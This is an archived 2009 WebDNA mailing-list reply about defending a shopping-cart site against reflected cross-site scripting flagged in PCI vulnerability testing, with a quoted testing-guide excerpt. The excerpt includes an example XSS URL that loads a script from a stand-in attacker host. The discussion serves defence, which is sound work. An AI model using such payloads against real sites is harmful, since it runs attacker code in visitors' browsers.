Re: [WebDNA] PCI Vulnerability testing

This WebDNA talk-list message is from

2009


It keeps the original formatting.
numero = 102395
interpreted = N
texte = I have no idea about a server level fix. This goes to never trusting user input. I thought it should always be surrounded by [raw] and [url] to prevent this. What do others do? Bill On Mon, Apr 13, 2009 at 2:08 PM, Bob Minor wrote: > What are people doing for the following type of attacks? > > http://www.example.com/shoppingcart.tpl?cart="" > > I assume you could just do a [removehtml][cart][/removehtml] > > I know you can do something like that at the code level but is there > something that can be done at the server level or does the new version > cicadae have built in protections? > > More info on the attack > >> >> http://www.example.com/?var="%20SRC="http://www.attacker.com/xss.js"> >> This will exploit the reflected cross site scripting vulnerability shown >> before, executing the javascript code stored on the attacker's web server as >> if it was originating from the victim web site, www.example.com. >> A complete test will include instantiating a variable with several attack >> vectors (Check Fuzz vectors appendix and Encoded injection appendix). >> Finally, analyzing answers can get complex. A simple way to do this is to >> use code that pops up a dialog, as in our example. This typically indicates >> that an attacker could execute arbitrary JavaScript of his choice in the >> visitors' browsers. > Associated Messages, from the most recent to the oldest:

    
  1. Re: [WebDNA] PCI Vulnerability testing ("Psi Prime, Matthew A Perosi " 2009)
  2. Re: [WebDNA] PCI Vulnerability testing (Jeffrey Jones 2009)
  3. Re: [WebDNA] PCI Vulnerability testing ("Psi Prime, Matthew A Perosi " 2009)
  4. Re: [WebDNA] PCI Vulnerability testing (William DeVaul 2009)
  5. Re: [WebDNA] PCI Vulnerability testing (Jeffrey Jones 2009)
  6. Re: [WebDNA] PCI Vulnerability testing ("Psi Prime, Matthew A Perosi " 2009)
  7. Re: [WebDNA] PCI Vulnerability testing (Govinda 2009)
  8. Re: [WebDNA] PCI Vulnerability testing ("Psi Prime, Matthew A Perosi " 2009)
  9. Re: [WebDNA] PCI Vulnerability testing (Govinda 2009)
  10. Re: [WebDNA] PCI Vulnerability testing ("Psi Prime, Matthew A Perosi " 2009)
  11. Re: [WebDNA] PCI Vulnerability testing (William DeVaul 2009)
  12. Re: [WebDNA] PCI Vulnerability testing (Govinda 2009)
  13. Re: [WebDNA] PCI Vulnerability testing (Marc Thompson 2009)
  14. Re: [WebDNA] PCI Vulnerability testing (William DeVaul 2009)
  15. [WebDNA] PCI Vulnerability testing (Bob Minor 2009)
I have no idea about a server level fix. This goes to never trusting user input. I thought it should always be surrounded by [raw] and [url] to prevent this. What do others do? Bill On Mon, Apr 13, 2009 at 2:08 PM, Bob Minor wrote: > What are people doing for the following type of attacks? > > http://www.example.com/shoppingcart.tpl?cart="" > > I assume you could just do a [removehtml][cart][/removehtml] > > I know you can do something like that at the code level but is there > something that can be done at the server level or does the new version > cicadae have built in protections? > > More info on the attack > >> >> http://www.example.com/?var="%20SRC="http://www.attacker.com/xss.js"> >> This will exploit the reflected cross site scripting vulnerability shown >> before, executing the javascript code stored on the attacker's web server as >> if it was originating from the victim web site, www.example.com. >> A complete test will include instantiating a variable with several attack >> vectors (Check Fuzz vectors appendix and Encoded injection appendix). >> Finally, analyzing answers can get complex. A simple way to do this is to >> use code that pops up a dialog, as in our example. This typically indicates >> that an attacker could execute arbitrary JavaScript of his choice in the >> visitors' browsers. > William DeVaul

DOWNLOAD WEBDNA NOW!

Top Articles:

Talk List

The WebDNA community talk-list is the best place to get some help: several hundred extremely proficient programmers with an excellent knowledge of WebDNA and an excellent spirit will deliver all the tips and tricks you can imagine...

Related Readings:

emailer (1997) WebCat editing, SiteGuard WAS:SiteAssociative lookup style? (1997) Re1000002: Setting up shop (1997) Context and commands (1998) calculating shipping costs by a sum of weights (1999) WebMerchant 3.0 for Mac shipping now (1998) Bug? (1997) Quitting WebMerchant ? (1997) RAM variables (1997) [WebDNA] Debian Lenny, Lighttpd and WebDNA FastCGI ... (2010) Exclamation point (1997) WebDNA tags in WebMerchant email templates ... (1997) Looking up two prices in Formulas.db (1997) [ReturnRaw] and hiding FORM data (2003) WebDNA (WebCatalog) working with iTools 7.3 (2004) [cart] not being interpreted inside [founditems] (1997) Verifying and adding new users (1997) pc (1997) Trouble with formula.db (1997) Alpha List for Catagory (1998)